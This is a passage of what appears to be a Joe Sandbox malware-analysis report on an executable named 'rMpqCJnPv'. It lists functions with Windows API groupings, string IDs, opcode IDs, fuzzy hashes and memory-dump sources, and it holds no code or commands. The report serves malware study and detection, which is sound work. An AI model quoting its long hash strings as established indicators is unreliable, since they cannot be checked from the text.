                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 2610073882-3931177956
                                                                                                                    • Opcode ID: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction ID: 6413ae9a96a4a131025670876233fb062b4d1c965923d94fe6d4f3e9a6845625
                                                                                                                    • Opcode Fuzzy Hash: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction Fuzzy Hash: 75025332A0864285EA56BB6DC15417DB3A1FF2AB44F855535CF0F87AB9CF2DE460C3A0
                                                                                                                    Function 00007FF7BB86246C Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 281fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 130057722-3010740371
                                                                                                                    • Opcode ID: 8d847a5cca28c879c43bb2ac5871ade1553603201caab05dbb2274aa3747f425
                                                                                                                    • Instruction ID: f41f4b21f7cc0e49667be93a2ff64704f196be9dbf068e6ce42d3015f623d5cf
                                                                                                                    • Opcode Fuzzy Hash: 8d847a5cca28c879c43bb2ac5871ade1553603201caab05dbb2274aa3747f425
                                                                                                                    • Instruction Fuzzy Hash: FFC17732618A8695DB20EF2DE8405E9A350FB9A788F805036EF4D4BB6DDF7CD215C750
                                                                                                                    Function 00007FF7BB88E40C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 177windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 2443926738-1918224756
                                                                                                                    • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction ID: 4a861795aebfe9f3bb8c174a31d9d8e7f0032cb836dfe163346b4cd57b33a8b3
                                                                                                                    • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction Fuzzy Hash: CD918A32A18B858AEB50DB69E4543ACB3A0FB99B84F904036DF4D47B68DF3CE055C760
                                                                                                                    Function 00007FF7BB868BF4 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectoryTime$File$Localwcscat$Systemwcscpy
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1111067124-438819550
                                                                                                                    • Opcode ID: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                    • Instruction ID: 7f677bb22634d59f3a4c70942271c1bd018d7a9912338c4feca3b93f666d42de
                                                                                                                    • Opcode Fuzzy Hash: 98a71cfb6502df9087812816f04c928264b270ce88f96a393908c63e275b4126
                                                                                                                    • Instruction Fuzzy Hash: DE717132618B8681DB10EF2DE8401EAA361FBAAB84F805032DF4E47779DF39E555C790
                                                                                                                    Function 00007FF7BB874F54 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 151windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                    • Opcode ID: 79184ce47625452b7c1eac5b0605ba5941df3dba146d8061b2bfb490f4dfffa8
                                                                                                                    • Instruction ID: 55eda5860a65f4148075befb459db420846a9e98936ae8f8bd72e4d3bf974ffc
                                                                                                                    • Opcode Fuzzy Hash: 79184ce47625452b7c1eac5b0605ba5941df3dba146d8061b2bfb490f4dfffa8
                                                                                                                    • Instruction Fuzzy Hash: 1A518436B14641CFEB40DF7AE444AADB7B1F749B88B409125EF4A53B28CF38E4258B50
                                                                                                                    Function 00007FF7BB84B0C4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                    • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction ID: 03c47bac585fb232f7fd1739474dcdd48f15cb26916b85485e203de6e695ada9
                                                                                                                    • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction Fuzzy Hash: 9F515E22A15A1289EB40EF6DD8846EDB370FB95B89F805031DF0E57679DF38E05AC390
                                                                                                                    Function 00007FF7BB881110 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 371COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF7BB87FD7B), ref: 00007FF7BB881143
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                    • Instruction ID: 05bc568b986f1780d6b79a94cc5c0110d8146ab77e7fda3b7427263021a56e77
                                                                                                                    • Opcode Fuzzy Hash: 48ce5f8ab7038dd94976e3b00d3167ae2925137fb7b03817e14e3f39c5b841c4
                                                                                                                    • Instruction Fuzzy Hash: 9BE1A712F0855782EA61BB6D9C44278A391BF3AB94BC44531DF1D477ACEF3CE86583A0
                                                                                                                    Function 00007FF7BB85A40C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 188windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 1460738036-3110715001
                                                                                                                    • Opcode ID: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                                                                    • Instruction ID: e943f21b665615457286c0207b6e159e5167860b1bf63f4c25ba87e462079643
                                                                                                                    • Opcode Fuzzy Hash: 425b3d5a2051c68f0670dcdad59ee9d800cc35cf3d8f3cee648c2718cc05a541
                                                                                                                    • Instruction Fuzzy Hash: 0D710821A082428AEB50EF7CD4C46BDA791BB56748FD44432DF4E076A9CF3CE465C760
                                                                                                                    Function 00007FF7BB863268 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 135COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadStringwprintf
                                                                                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 3297454147-3080491070
                                                                                                                    • Opcode ID: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction ID: 71a51ede2c845e0da65fd1f0090da6f8811ed65d223927e8499be9ed73eb7633
                                                                                                                    • Opcode Fuzzy Hash: 921b602f5fcb54eacd7a62b3ce9e0f2e08e995aee376e847d7660b2710a32505
                                                                                                                    • Instruction Fuzzy Hash: 3A613921A18A4296EB00FB6CE4405E8A365FFAA744FC01032EF4D536BEDE7CE516C790
                                                                                                                    Function 00007FF7BB8574B0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 128windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Messagewprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 4051287042-2268648507
                                                                                                                    • Opcode ID: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction ID: 2be986223f11d525f230a4530992b44e17230b89cf155c21793a4bcc8986909d
                                                                                                                    • Opcode Fuzzy Hash: 6f60d895e456e1bcae49e483a71499a5f57f9936a6ffa7df15260821f561c8be
                                                                                                                    • Instruction Fuzzy Hash: 0A515C21A18A4291EB00FB6CE8414ADA365FFAA744BC05032EF5D536BEDE7CE516C790
                                                                                                                    Function 00007FF7BB85D4AC Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 65sleepwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 3935177441-3405671355
                                                                                                                    • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction ID: 4f1234954e74b383de743ad25a9eb3ebe0a5d24a529abf7171a56bfbe6bc8a06
                                                                                                                    • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                                                                    • Instruction Fuzzy Hash: 6C312320A0970785FB10BF3CF894A75A252BFA6754FC45035DF0E0A6B8DE2CF46583A0
                                                                                                                    Function 00007FF7BB7E15EC Relevance: 18.2, APIs: 12, Instructions: 191timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1974058525-0
                                                                                                                    • Opcode ID: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                                                                    • Instruction ID: fac9f718ba03832e6d65452721ad5dc6efbcce890ed4496149475687b01c1ab9
                                                                                                                    • Opcode Fuzzy Hash: dcc26eb72664b9d1949b187f4fad04aff093ad4780d9238f6c635ec0504560de
                                                                                                                    • Instruction Fuzzy Hash: B8916E25A1960685EE50AF6DD451278A364FFAAB84FD40136CF4E8767CCF3CF46083A0
                                                                                                                    Function 00007FF7BB857E64 Relevance: 18.2, APIs: 12, Instructions: 173keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction ID: fbffe4cc76cf5bca2706e384705152975686364c771658b8bb4c9de2e580551e
                                                                                                                    • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction Fuzzy Hash: A771D71660C3C145FB34AB3C94802B9AB51FB67B88FD84039CB8D032A9CE5DE955C7B1
                                                                                                                    Function 00007FF7BB852F78 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3096461208-0
                                                                                                                    • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                                                    • Instruction ID: 8c28d478a82c02992673d40f72b29d92afd600f31c69eb61dbd2e3a3d01fb84a
                                                                                                                    • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                                                                    • Instruction Fuzzy Hash: CA618072B046408BE714DB7DD4446ACB7A2B799B88F508139DE0A93F58DF38E9158B50
                                                                                                                    Function 00007FF7BB84FF44 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 243windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                                                                    • String ID: %s%u
                                                                                                                    • API String ID: 1412819556-679674701
                                                                                                                    • Opcode ID: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                    • Instruction ID: f9be92609198320a9dc596f263cfb49603cf0f2ad9e34a1723d19731d4da04a6
                                                                                                                    • Opcode Fuzzy Hash: ec5f86a190bb73f09945e144781202aaf3720bc00edec1e84de13663eea9de37
                                                                                                                    • Instruction Fuzzy Hash: 8FB1D272B086469AEB19AB2DD8446F8A7A0FB56B84FC00031CF1D476A9DF3DE564C790
                                                                                                                    Function 00007FF7BB85176C Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 226COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                                                                    • String ID: ThumbnailClass
                                                                                                                    • API String ID: 4010642439-1241985126
                                                                                                                    • Opcode ID: 0882505c88ed3b00aae6e4629277f07059bb2b253e5c1484f821cf4c8a59efc7
                                                                                                                    • Instruction ID: 6fc803606feef80d952f675fdf3e845f0c4939ccd084947761d15b22da4a3d85
